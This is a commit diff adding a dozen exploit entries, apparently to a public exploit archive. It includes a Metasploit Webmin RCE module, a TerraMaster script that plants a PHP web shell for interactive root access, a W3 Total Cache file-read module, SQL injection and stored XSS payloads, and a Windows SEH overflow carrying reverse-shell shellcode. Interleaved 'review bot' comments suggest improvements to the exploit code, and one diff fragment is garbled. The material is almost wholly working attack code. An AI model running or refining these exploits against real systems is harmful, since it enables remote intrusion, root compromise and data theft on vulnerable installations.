DB: 2020-12-23
12 changes to exploits/shellcodes 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) Victor CMS 1.0 - File Upload To RCE Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) CSE Bookstore 1.0 - Multiple SQL Injection Library Management System 3.0 - _Add Category_ Stored XSS Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit) Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) Artworks Gallery Management System 1.0 - 'id' SQL Injection Faculty Evaluation System 1.0 - Stored XSS TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
This commit is contained in:
parent
cd30696d15
commit
3aeb1a0d81
13 changed files with 739 additions and 0 deletions
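--- a/exploits/linux/webapps/49318.rb
+++ b/exploits/linux/webapps/49318.rb
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
+'Description' => %q(
+This module exploits an arbitrary command execution vulnerability in Webmin
+1.962 and lower versions. Any user authorized to the "Package Updates"
+module can execute arbitrary commands with root privileges.
+It emerged by circumventing the measure taken for CVE-2019-12840.
+s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
+Therefore, since the package name variable is placed directly in the system command,
+we can manipulate it using some escape characters that HTTP supports.
+For example, we can escape control by dropping the command line down one line.
+We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
+we must add double an ampersand(&&) to the end of the payload (%26%26)
+),
+'Author' => [
+'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', 'CVE-2020-35606'],
+['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
+],
+'Privileged' => true,
+'Payload' =>
+{
+'DisableNops' => true,
+'Space' => 512,
+'Compat' =>
+{
+'PayloadType' => 'cmd'
+}
+},
+'DefaultOptions' =>
+{
+'RPORT' => 10000,
+'SSL' => false,
+'PAYLOAD' => 'cmd/unix/reverse_perl'
+},
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Targets' => [['Webmin <= 1.962', {}]],
+'DisclosureDate' => '2020-12-21',
+'DefaultTarget' => 0)
+)
+register_options [
+OptString.new('USERNAME', [true, 'Webmin Username']),
+OptString.new('PASSWORD', [true, 'Webmin Password']),
+OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
+]
+end
+
+def peer
+"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+end
+
+def login
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+'cookie' => 'testing=1', # it must be used for "Error - No cookies"
+'vars_post' => {
+'page' => '',
+'user' => datastore['USERNAME'],
+'pass' => datastore['PASSWORD']
+}
+})
+
+if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+return $1
+end
+
+return nil unless res
+''
+end
+
+def check
+cookie = login
+return CheckCode::Detected if cookie == ''
+return CheckCode::Unknown if cookie.nil?
+
+vprint_status('Attempting to execute...')
+# check version
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
+'cookie' => "sid=#{cookie}",
+'vars_get' => { "xnavigation" => "1" }
+})
+
+if res && res.code == 302 && res.body
+version = res.body.split("Webmin 1.")[1]
+return CheckCode::Detected if version.nil?
+version = version.split(" ")[0]
+if version <= "962"
+# check package update priv
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, "package-updates/"),
+'cookie' => "sid=#{cookie}"
+})
+
+if res && res.code == 200 && res.body =~ /Software Package Update/
+print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+return CheckCode::Vulnerable
+end
+end
+end
+print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
+print_status("Please try with another user account!")
+CheckCode::Safe
+end
+
+def exploit
+cookie = login
+if cookie == '' || cookie.nil?
+fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+end
+print_good("Session cookie: #{cookie}")
+
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+'cookie' => "sid=#{cookie}"
+)
+unless res && res.code == 200
+fail_with(Failure::Unknown, 'Request failed')
+end
+
+print_status("Attempting to execute the payload...")
+run_update(cookie)
+end
+
+def run_update(cookie)
+@b64p = Rex::Text.encode_base64(payload.encoded)
+perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+payload = Rex::Text.uri_encode(perl_payload)
+
+res = send_request_cgi(
+{
+'method' => 'POST',
+'cookie' => "sid=#{cookie}",
+'ctype' => 'application/x-www-form-urlencoded',
+'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+'headers' =>
+{
+'Referer' => "#{peer}/package-updates/?xnavigation=1"
+},
+# new vector // bypass to backslash %0A%7C{}%26%26
+'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
+# for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
+})
+end
+end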
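Review bot: In `check`, `if version <= "962"` compares the extracted minor version as a string, so the ordering is lexicographic rather than numeric: a minor with fewer digits (e.g. "99") sorts above "962" and is reported Safe, while a longer one (e.g. "1000") sorts below it and is reported Vulnerable; `if version.to_i <= 962` gives the intended comparison and also tolerates trailing non-digits left by the `split`. In `exploit`, `print_good("Session cookie: #{cookie}")` writes a live session token into the console and module log; printing only a success message, or moving it to `vprint_good`, is the usual hygiene for credentials. In `run_update`, the local `payload = Rex::Text.uri_encode(perl_payload)` shadows the framework's `payload` method called on the line above, and `perl_payload` actually holds a bash wrapper; names such as `wrapper_cmd` and `encoded_cmd` would avoid both confusions, and the `@b64p` instance variable can be a plain local since nothing else reads it. The description string also carries typos ("paylad", "double an ampersand") and a missing space after "values." that are worth fixing in the same pass.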
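--- a/exploits/linux/webapps/49321.py
+++ b/exploits/linux/webapps/49321.py
@@ -0,0 +1,66 @@
+# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
+# Date: 12/12/2020
+# Exploit Author: IHTeam
+# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: <= 4.2.06
+# Tested on: 4.1.30, 4.2.06
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import time
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
+parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
+args = parser.parse_args()
+
+url = args.url
+headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+epoch_time = int(time.time())
+shell_filename = "debug"+str(epoch_time)+".php"
+
+def check_endpoint(url, headers):
+response = requests.get(url+'/version', headers=headers, verify=False)
+if response.status_code == 200:
+print("[+] TerraMaster TOS version: ", str(response.content))
+else:
+print("\n[-] TerraMaster TOS response code: ", response.status_code)
+sys.exit()
+
+def upload_shell(url, headers, shell_filename):
+payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
+payload = urllib.parse.quote(payload, safe='')
+print("[/] Uploading shell...")
+response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
+time.sleep(1)
+response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
+if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
+print("[+] Upload succeeded")
+else:
+print("\n[-] Error uploading shell: ", response.content)
+sys.exit()
+
+def interactive_shell(url, headers, shell_filename, cmd):
+response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
+print(str(response.text)+"\n")
+
+
+def delete_shell(url, headers, shell_filename):
+delcmd = "rm /usr/www/"+shell_filename
+response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
+print("\n[+] Shell deleted")
+
+check_endpoint(url, headers)
+upload_shell(url, headers, shell_filename)
+try:
+while True:
+cmd = input("# ")
+interactive_shell(url, headers, shell_filename, cmd)
+except:
+delete_shell(url, headers, shell_filename)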
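Review bot: The `#!/usr/bin/env python3` line sits below the comment header, so it is not a shebang and the file is not directly executable despite being committed with the executable bit; it belongs on line 1, above `# Exploit Title`. The bare `except:` around the interactive loop swallows every exception, including `KeyboardInterrupt` and `SystemExit`, so the user never learns why the loop ended; `except (KeyboardInterrupt, EOFError): pass` followed by `finally: delete_shell(url, headers, shell_filename)` keeps the cleanup while letting real errors surface. Every request passes `verify=False`, which turns off TLS certificate validation for the whole session; that is worth stating in the header so a reader knows the tool trusts any certificate the endpoint presents. The first `response` assignment in `upload_shell` and the one in `delete_shell` are never read, so the status of the upload request itself is not checked before the sleep.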
|
@ -4,6 +4,7 @@
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
|
||||
I DESCRIPTION
========================================================================
|
|
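--- a/exploits/php/webapps/49310.txt
+++ b/exploits/php/webapps/49310.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Victor CMS 1.0 - File Upload To RCE
+# Date: 20.12.2020
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+
+# Tested on: Apache2/Linux
+
+Step1: register http://localhost/CMSsite-master/register.php
+step2: login as user
+step3: Go to Profile
+step4: upload imag as php file (upload shell.php)
+step5: update user
+step6: You will find your shell in img folder :/path/img/cmd.php
+
+http://localhost/CMSsite-master/img/cmd.php?cmd=id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)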
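--- a/exploits/php/webapps/49312.txt
+++ b/exploits/php/webapps/49312.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
+# Date: 12-21-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 750
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
+# Vulnerable Parameter : network_csv
+
+
+# POC
+
+POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
+Content-Length: 1597
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_manual_defined"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_select"
+
+300
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_text"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_units"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="taskname"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="id_recon_server"
+
+3
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv_enabled"
+
+on
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv"; filename="test.txt"
+Content-Type: text/plain
+
+' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network"
+
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="comment"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="submit"
+
+Next
+-----------------------------308827614039434535382911921119--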
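--- a/exploits/php/webapps/49314.txt
+++ b/exploits/php/webapps/49314.txt
@@ -0,0 +1,110 @@
+# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
+# Date : 2020-12-21
+# Author : Musyoka Ian
+# Version : CSE Bookstore 1.0
+# Vendor Homepage: https://projectworlds.in/
+# Platform : PHP
+# Tested on : Debian
+
+CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
+
+Below is results returned by SQLMap
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
+
+
+POC 1
+
+REQUEST
+========
+GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+Host: 192.168.196.83
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+Upgrade-Insecure-Requests: 1
+
+RESPONSE
+========
+
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:09:49 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 172
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
+
+POC 2
+Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
+
+REQUEST
+=======
+
+POST /ebook/cart.php HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+
+bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+RESPONSE
+=======
+get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
+
+POC 3.
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
+
+REQUEST
+=======
+GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/books.php
+Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:47:58 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 188
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1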
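--- a/exploits/php/webapps/49315.txt
+++ b/exploits/php/webapps/49315.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-22
+# Google Dork: N/A
+# Vendor Homepage: https://otsglobal.org/
+# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
+# Affected Version: 3.0
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Admin.
+
+Step 2. Select "Book" from menu and select "Categories" from sub menu and
+after that click on "Add Category".
+
+Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
+
+Step 4. Now Click on "Save" , Go to "Category" and See last , there you
+will get alert box.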
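--- a/exploits/php/webapps/49316.txt
+++ b/exploits/php/webapps/49316.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-21
+# Google Dork: N/A
+# Vendor Homepage: https://www.ramomcoder.com/
+# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
+# Affected Version: 3.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Super Admin.
+
+Step 2. Select "Branch" from menu and after that click on "Create Branch".
+
+Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" ,
+"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
+
+Step 4. Now Click on "Save" and you will get a list of alert boxes.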
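--- a/exploits/php/webapps/49317.rb
+++ b/exploits/php/webapps/49317.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Exploit::Remote::HTTP::Wordpress
+include Msf::Auxiliary::Scanner
+
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
+'Description' => %q{
+This module exploits an unauthenticated directory traversal vulnerability
+in WordPress plugin
+'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
+the web server privileges.
+},
+'References' =>
+[
+['CVE', '2019-6715'],
+['WPVDB', '9248'],
+['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
+['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
+],
+'Author' =>
+[
+'VinhJAXT', # Vulnerability discovery
+'Hoa Nguyen - SunCSR Team' # Metasploit module
+],
+'DisclosureDate' => '2014-09-20',
+'License' => MSF_LICENSE
+)
+)
+
+register_options(
+[
+OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
+]
+)
+end
+
+def check
+check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
+end
+
+def run_host(ip)
+traversal = '../' * datastore['DEPTH']
+filename = datastore['FILEPATH']
+filename = filename[1, filename.length] if filename =~ %r{^/}
+
+json_body = { 'Type' => "SubscriptionConfirmation",
+'Message' => '',
+'SubscribeURL' => "file:///#{traversal}#(unknown)"
+}
+
+res = send_request_cgi({
+'method' => 'PUT',
+'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
+'ctype' => 'application/json',
+'data' => JSON.generate(json_body)
+})
+
+fail_with Failure::Unreachable, 'Connection failed' unless res
+fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
+fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+
+print_status('Downloading file...')
+print_line("\n#{res.body}\n")
+
+fname = datastore['FILEPATH']
+path = store_loot(
+'w3_total_cache.traversal',
+'text/plain',
+ip,
+res.body,
+fname
+)
+print_good("File saved in: #{path}")
+end
+end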
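Review bot: In `run_host`, `filename` is computed from FILEPATH and stripped of its leading slash but never used afterwards: the `SubscribeURL` value reads `"file:///#{traversal}#(unknown)"`, which looks like a rendering artefact where an interpolation was replaced by the literal text `#(unknown)`, but as shown the request carries no file name at all and the loot would be meaningless; the literal should be confirmed against the original source and the `filename` local either interpolated or removed. The version bounds also disagree with the prose: `check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')` is passed '0.9.26' where the description says the affected range is 0.9.2.6-0.9.3, and `'DisclosureDate' => '2014-09-20'` sits next to references for CVE-2019-6715 and a 2019 write-up, so one of the two dates is presumably wrong. Minor points in the same method: `fname = datastore['FILEPATH']` duplicates the earlier lookup, `res.body.length.zero?` is `res.body.empty?`, and the message 'Connection failed. Nothing was downloaded' on a non-200 reply is misleading because the connection did succeed, so something like 'Unexpected HTTP status; nothing was downloaded' describes the branch better.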
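--- a/exploits/php/webapps/49319.txt
+++ b/exploits/php/webapps/49319.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Vijay Sachdeva
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+# Tested on Kali Linux
+
+Step 1. Log in to the application with admin credentials.
+
+Step 2. Click on "Explore" and then select "Artworks".
+
+Step 3. Choose any item, the URL should be "
+
+http://localhost/art-bay/info_art.php?id=6
+
+Step 4. Run sqlmap on the URL where the "id" parameter is given
+
+
+sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
+
+---
+
+
+Parameter: id (GET)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause
+
+Payload: id=8 AND 4531=4531
+
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
+
+
+Type: UNION query
+
+Title: Generic UNION query (NULL) - 9 columns
+
+Payload: id=8 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
+-
+
+---
+
+[08:18:34] [INFO] the back-end DBMS is MySQL
+
+[08:18:34] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+
+---
+
+
+Step 5. Sqlmap should inject the web-app successfully which leads to
+information disclosure.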
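--- a/exploits/php/webapps/49320.txt
+++ b/exploits/php/webapps/49320.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
+# Exploit Author: Vijay Sachdeva (pwnshell)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
+# Tested on Kali Linux
+
+Step 1: Log in to the application with admin credentials
+
+Step 2: Click on Questionnaires, then click "Action" for any Academic Year
+and then click manage.
+
+Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of
+the Question form.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS
+payloads. Whenever you click on Questionnaires, click action for any
+academic year, and then manage, your XSS Payloads will be triggered for
+that "Academic Year"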
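--- a/exploits/windows/local/49322.py
+++ b/exploits/windows/local/49322.py
@@ -0,0 +1,78 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
+# Date: 2020-12-22
+# Exploit Author: Florian Gassner
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Version: 9.05
+# Tested on: Windows 10 x64
+
+# Computer -> From Text File -> Choose exploit.txt
+
+import struct
+
+"""
+Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
+"""
+
+OFFSET = 214
+
+"""
+badchars = '\x00\x09\x0a\x0d\x3a\x5c'
+"""
+
+"""
+Log data, item 23
+Address=01015AF4
+Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
+"""
+
+pop_pop_ret = struct.pack("<I", 0x01015af4)
+
+short_jump = '\xEB\x06\x90\x90'
+
+"""
+msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
+"""
+shellcode = ""
+shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
+shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
+shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
+shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
+shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
+shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
+shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
+shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
+shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
+shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
+shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
+shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
+shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
+shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
+shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
+shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
+shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
+shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
+shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
+shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
+shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
+shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
+shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
+shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
+shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
+shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
+shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
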